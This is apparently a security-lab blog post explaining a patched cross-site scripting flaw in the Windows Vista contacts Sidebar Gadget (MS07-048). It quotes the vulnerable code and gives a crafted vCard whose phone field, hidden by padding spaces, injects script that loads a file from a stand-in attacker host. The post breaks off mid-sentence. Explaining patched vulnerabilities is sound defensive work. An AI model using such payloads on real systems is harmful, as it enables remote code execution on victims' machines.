Vista Gadget Patches in MS07-048

Among the items patched in August by Microsoft were bugs in several Sidebar Gadgets included as part of Windows Vista. The advisory lists the RSS, contact, and weather gadgets as vulnerable to remote code execution.

Windows Vista Gadgets are described by Microsoft as "mini applications." This is somewhat of a misnomer. At their simplest, they are locally-hosted web applications that bundle all HTML, javascript, and other resources in a directory. As such, the application that hosts gadgets is actually IE7, or to use the description of Microsoft, gadgets "[use] the functionality of the Microsoft HTML (MSHTML) runtime, [and] are not limited by the standard browser security model."

Removing the standard browser security model means that gadgets have the ability to make calls to any code available locally or remotely. Local Active X controls, shell commands, and executables may be executed by a gadget. As will also be demonstrated, remotely-hosted executables can be downloaded to the machine and subsequently run.

The nature of the vulnerability in the contacts gadget is cross-site scripting in any of the phone number fields for a contact. Importing a specially-crafted contact file, and then viewing the contact in the gadget will result in code execution. This concept was to be one of the points in a talk at Defcon by Aviv Raff. A video demonstration of the attack has been made public. Since the bug is patched, we thought we'd show just how this attack works.

In the folder for the contact gadget is the file contact.html. The vulnerable version contains the following line of code, which inserts each of the phone numbers for the contact into the gadget HTML view:

newCell.innerHTML = "";

Each of the phone number fields is being placed into an tag with no filtering; this is as basic a cross-site scripting vulnerability as you can get.

First, you must convince your victim to add your vcard. An example card is shown below, with long lines broken by backslash:

BEGIN:VCARD
VERSION:3.0
FN:Inspector Gadget
TEL;type=HOME:(512) 555 - 1212\
                                            ' \
style='c:expression(document.all[document.all.length-1]\
.src="http://myevilhackerspace.com/adodb.js")
END:VCARD

One thing to point out here is that the embedded spaces between the telephone number and the embedded HTML style attribute will hide the attack when viewed in the contact manager in Windows Vista. Up to 3 embedded lines of javascript could be included in the contact file, as the home, work, and mobile phone numbers are all open to the same attack. Luckily, one injected javascript file will do the trick.

The embedded style tag evaluates a line of javascript which causes IE7 to download the javascript. This is done abusing the

Posted by Todd Manning
Bookmark and Share Printer Friendly Create PDF
0 comments
Tags:
Post a Comment
  7. Leave this field empty

Required Field

Videos

More >


Interact







Google+		 LinkedIn

YouTube

Newsletter


Subscribe to BreakingPoint Labs blog by email:

Type in your email, hit submit and quickly verify your address.